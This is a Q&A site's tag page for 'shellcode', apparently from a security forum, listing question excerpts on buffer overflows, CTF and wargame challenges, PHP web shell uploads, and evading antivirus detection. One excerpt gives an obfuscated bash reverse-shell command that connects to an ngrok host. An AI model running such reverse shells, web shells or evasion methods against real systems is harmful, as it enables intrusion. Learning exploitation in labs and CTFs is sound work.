Questions tagged [shellcode]
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.
243 questions
0 votes, 0 answers, 65 views
Why does my uploaded shell as .php get downloaded rather than executed when I hit the URL?
I have uploaded a PHP shell using a file upload vulnerability. But when I hit the .php URL after uploading it, it gets downloaded rather than executed. Why is that? And how can I execute my shell code?...
1 vote, 2 answers, 76 views
PHP embedded within PNG is not executing, rather rendering, in IIS but executes in Apache
I am pentesting a site with all permissions. I have been able to upload a PHP shell embedded within a PNG image. I have also been able to change the extension of the file like something.php. So my ...
1 vote, 0 answers, 68 views
How to get Avast to stop quarantining my program?
I need to use a .NET shellcode inside a C++ unmanaged process. Let me be clear: the shellcode is not malicious by any means, I just need it to load .NET code in an unmanaged process.
Antivirus won't ...
1 vote, 0 answers, 37 views
How can I jump to an address after executing a donut shellcode?
I'm looking to execute a shellcode by packaging it inside an executable.
I generate an executable (open the calculator)
I output a shellcode from the executable with donut.
donut.exe -i opencalc.exe ...
0 votes, 0 answers, 56 views
Buffer Overflow shell
I'm trying to exploit the code posted by ir0nstone at this link https://ir0nstone.gitbook.io/notes/types/stack/shellcode.
I followed any of the steps listed in the tutorial, ASLR is not enabled on my ...
0 votes, 1 answer, 69 views
Reverse Shell payload does not work
$(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27')
-i: -c: line 1: unexpected EOF while looking for matching `''
I was trying to get a ...
0 votes, 0 answers, 110 views
push /bin/sh to get a shell
I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one:
Put in case that I can control the RIP and there are no limitations or filters. So I can execute ...
1 vote, 0 answers, 94 views
How can I exploit the following code using string format vulnerabilities, Global offset table & GDB? [closed]
The following code should be exploited and I need to exploit it in such a way that it runs my command (l33t) and there should be shellcode and exploit included, so that it runs my command. I believe I ...
1 vote, 0 answers, 113 views
How to properly pack address into bytes to overwrite EIP register
I'm learning how to exploit a tiny web server based on a well written post here: https://blog.coffinsec.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html
I am very close to ...
0 votes, 0 answers, 239 views
Encoding shellcode to hide in filename / directory
Working on a CTF challenge and the coordinators hint suggests that one of the vectors to inject shellcode is via pathing. Looking at debugging prints does show the cwd and filename are passed onto the ...
0 votes, 0 answers, 241 views
Decoding shellcode gets detected in memory on runtime
I am developing a custom shellcode encoder in C++. It takes shellcode as a command line argument and generates encoded shellcode (unsigned char array) and the instructions to decode it (C/C++ code). I ...
0 votes, 1 answer, 239 views
Exporting shellcode to environment variable doesn't work as expected
(This is a question regarding a challenge in a wargame on overthewire.org called Narnia, similar to Shellcode does not execute as the owner)
When exporting shellcode to EGG environment variable
export ...
0 votes, 1 answer, 504 views
Unable to execute shellcode on x86_64 architecture
I currently got interested in binary exploitation (even though I do not know if today is still useful).
I started studying shellcode and buffer overflow (stack-buffer overflow, specifically). I know ...
1 vote, 1 answer, 440 views
Buffer overflow stops executing shellcode in the middle of it
I am trying to execute a simple shellcode by using a buffer overflow. The shell code starts executing but stops in the middle (even though it is fully copied to memory).
This is the vulnerable C code:...
0 votes, 1 answer, 180 views
Info integer overflow vulnerability
I've found this interesting question Is this integer overflow vulnerability exploitable?.
How can I practically find the next instruction (in gdb) so that I can overwrite the return address and ...